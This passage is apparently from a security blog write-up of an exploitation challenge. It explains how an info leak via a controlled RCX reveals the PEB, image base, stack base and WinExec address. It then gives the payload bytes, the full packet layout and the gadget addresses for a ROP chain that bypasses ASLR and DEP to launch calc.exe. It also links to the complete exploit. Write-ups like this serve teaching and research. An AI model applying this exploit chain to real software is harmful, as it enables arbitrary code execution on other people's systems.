<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">One good thing in this case is that we can actually control the RCX from our input buffer with the characters provided from 513 till 528.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The first thing I had to do was get the process address from the PEB.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">These are the last bytes we send in our payload: <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">“\x<span style="color: #c00000;">65</span>\x65\x65\x65\x65\x65\x65\x65\x<span style="color: #c00000;">60</span>\x00\x00\x00\x00\x00\x00\x00”<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">With this we could acquire the PEB address. \x65 is the leading byte, taken from the instruction combinations produced earlier:<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="background-color: white; font-size: 14pt; line-height: 21.466665267944336px;">65488b01c3 <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">It is well known that on x64 Windows, GS is a special segment register that points to the TEB, and the pointer to the PEB can be read through it at the right offset. Since we could control RCX, we read through GS directly at offset 0x60, where the PEB pointer is stored, hence the highlighting.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Since the application always sends the leaked data back to us, we can get this address and use it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The next step would be to get the Image Base Address of the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The Image Base Address is located at the PEB + 0x10 offset. In this case we had to set RCX to the leaked PEB address + 0x10 to be able to leak the address.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case, according to our possible instructions we chose:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The first byte is 47 and, as before, these are the last bytes of our payload:<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">“\x<span style="color: red;">47</span>\x65\x65\x65\x65\x65\x65\x65 + address+0x10”<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br />As an end goal we need to create a ROP chain to execute calc.exe.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Since we would like to bypass ASLR, the leak is already useful, but to execute something we would have to bypass DEP as well.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case it is good that we have, in the beginning of the application, a winexec call.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEHnKbShIOV2tR-zaAYDA2ELv01uzGAVA0lWHGjXZChzaT6_zEXv_PiWW0IFmVCZsEV6sgfk9a0ShrZWsd3QvAIV7CnmZFXdTFPFcy6JhE1y-ug0Qzq-p75VMjZLgDiRGbAkv_nW-VA9_/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="975" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEHnKbShIOV2tR-zaAYDA2ELv01uzGAVA0lWHGjXZChzaT6_zEXv_PiWW0IFmVCZsEV6sgfk9a0ShrZWsd3QvAIV7CnmZFXdTFPFcy6JhE1y-ug0Qzq-p75VMjZLgDiRGbAkv_nW-VA9_/s400/3.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Therefore, in the end we will call calc.exe through WinExec, but WinExec requires a pointer to the name of the application to execute, hence a pointer to the string calc.exe followed by a null terminator.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Somehow I had to be able to find that place in memory with my string. The best way was to get the StackBase Limit and get towards the stack base to find where it is.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">First, I had to leak StackBase Limit.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">StackBaseLimit is in the TEB at 0x10 offset through the GS register.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The initial request I used :<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I controlled the RCX by setting it to 0x10.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">After actually getting the leaked address of the Stack Base Limit, it is time for a loop towards the Stack Base to find the correct string which would be calc.exe.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By doing a loop, I started leaking the memory cells of the stack up to a point where it detected my string.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The moment the string was found, I saved into a counter and multiplied by 0x08 to get how many cells down the stack I had to go.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">So now I had the address of the string.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In the above scenario I used: <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">With RCX as the Stack Base Limit and constantly adding 0x08 to it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The next step would be to get the winexec’s address on the stack. By checking the .rdata of the application I could see the offset of it.<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Na-nZmWFMib8Yu7PPxjsIs_9jm5QUeoDLzqogWx87wRtD-GXZGqYVaQ3i2hn0miBwshYja_uzdT_eFeju7kgoSR50lRQPNU8vD49geU2HRVkN_BlS-D-m7kQxzNkfLrU3poDrq4ylerk/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="67" data-original-width="975" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Na-nZmWFMib8Yu7PPxjsIs_9jm5QUeoDLzqogWx87wRtD-GXZGqYVaQ3i2hn0miBwshYja_uzdT_eFeju7kgoSR50lRQPNU8vD49geU2HRVkN_BlS-D-m7kQxzNkfLrU3poDrq4ylerk/s400/4.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case, I need to leak the address from Image Base Address + 0x9010 offset.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By using exactly the same instructions as before:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Then, setting RCX to the Image Base Address + 0x9010, I get the leaked address for WinExec on the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">For the final request to the application I used <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 51 push rcx</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">1: 48 8b 01 mov rax,QWORD PTR [rcx]</span><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I set the RCX to a pivot gadget “add rsp,78h ; ret”, so I can stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I used Ropper and rp++ to get gadgets out of the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Thankfully, the ret instruction gets us to a point in our buffer.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">According to MSDN, WinExec requires 2 arguments: the name of the application and a number which sets the mode of the window.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">On Windows 10 x64, the calling convention passes arguments in rcx, rdx, r8, r9 and then on the top of the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The structure of the packet is this. The whole packet is the cookie + 528 characters.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Structure:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #b8cce4; border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|16 junk bytes| - padding<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rax_gadget| - pops the Image Base Address into RAX so that RAX holds a valid address, because the only pop rdx and pop rcx gadgets leave bad values in it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|Image Base Address – 0x08| - valid address<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rdx_gadget| - pop rdx gadget to put 0x01 in place as the second WinExec argument.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|0x01| - WinExec UINT uCmdShow<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rax_gadget| - again, for the same reason: the pop rcx gadget will leave a bad value in rax.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|pop_rcx_gadget| - set the pointer address that points to calc.exe\x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|address_pointing_calc| - address that points to calc.exe\x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|72 junk bytes| - padding<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|ret_gadget| - just a return gadget to fix the stack alignment to a 16-byte boundary, because CreateProcessA is called inside the WinExec function, which includes a movaps instruction. Movaps instructions check whether the stack is aligned and raise an exception if it is not.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|winexec_leaked_address| - WinExec address on the stack.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x78| - adds 0x78 bytes to the current RSP to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|120 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x78| - adds 0x78 bytes to the current RSP to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|120 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x28| - adds 0x28 bytes to the current RSP to reach the next stack pivot.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|40 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|add_rsp_0x58| - adds 0x58 bytes to the current RSP to reach the original return pointer address, so the application continues executing instead of crashing.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|8 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|calc.exe\x00| - string to set in memory.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">|15 junk bytes| - padding.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Gadgets Used:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="background-color: #c6d9f1; border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 467.5pt;" valign="top" width="468"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x14000158b: add rsp, 0x78 ; ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x0000000140004525: pop rdx; add byte ptr [rax], al; cmp word ptr [rax], cx; je 0x4530; xor eax, eax; ret; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x140001167: pop rax ; ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x00000001400089ab: pop rcx; or byte ptr [rax], al; add byte ptr [rax - 0x77], cl; add eax, 0x4b12; add rsp, 0x48; ret;<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x0000000140001164: add rsp, 0x58; ret; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x14000158f: ret ; <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">0x00000001400011d5: add rsp, 0x28; ret;<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The full working exploit can be downloaded from our GitHub:<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><a href="https://github.com/telspacesystems/BFS-Ekoparty-2019-challenge/" style="font-family: -webkit-standard;">https://github.com/telspacesystems/BFS-Ekoparty-2019-challenge/</a></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;">Mandatory calc.exe POC screenshot:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqhXYfzlHAFd9IJZBrjDGZEfJST2-v8hMpM4ASNIlGe7vXnsbGOlWnvmCnYlkaDfpu8pR8MW6UGxH0gupasCh63Se1TqQlktJk4fps8SciznucJM5SmUYPBttltGQjFCdtW5PLbDpCAvl/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="561" data-original-width="1107" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKqhXYfzlHAFd9IJZBrjDGZEfJST2-v8hMpM4ASNIlGe7vXnsbGOlWnvmCnYlkaDfpu8pR8MW6UGxH0gupasCh63Se1TqQlktJk4fps8SciznucJM5SmUYPBttltGQjFCdtW5PLbDpCAvl/s400/5.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span style="font-size: 14pt;"><br /></span></div>
<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
TSA-2019-001: Asus Precision TouchPad 11.0.0.25 (Pool Overflow) (posted 2019-08-30)
<div class="MsoNormal" style="background-color: white; font-family: Calibri; font-size: 11pt; line-height: 10.5pt; margin: 0in 0in 0.0001pt; text-align: justify;">
<b><span style="color: #333333; font-family: "arial"; font-size: 10.5pt;">Telspace Systems Security Advisory</span></b><span style="color: #333333; font-family: "helvetica"; font-size: 10.5pt;"><o:p></o:p></span></div>
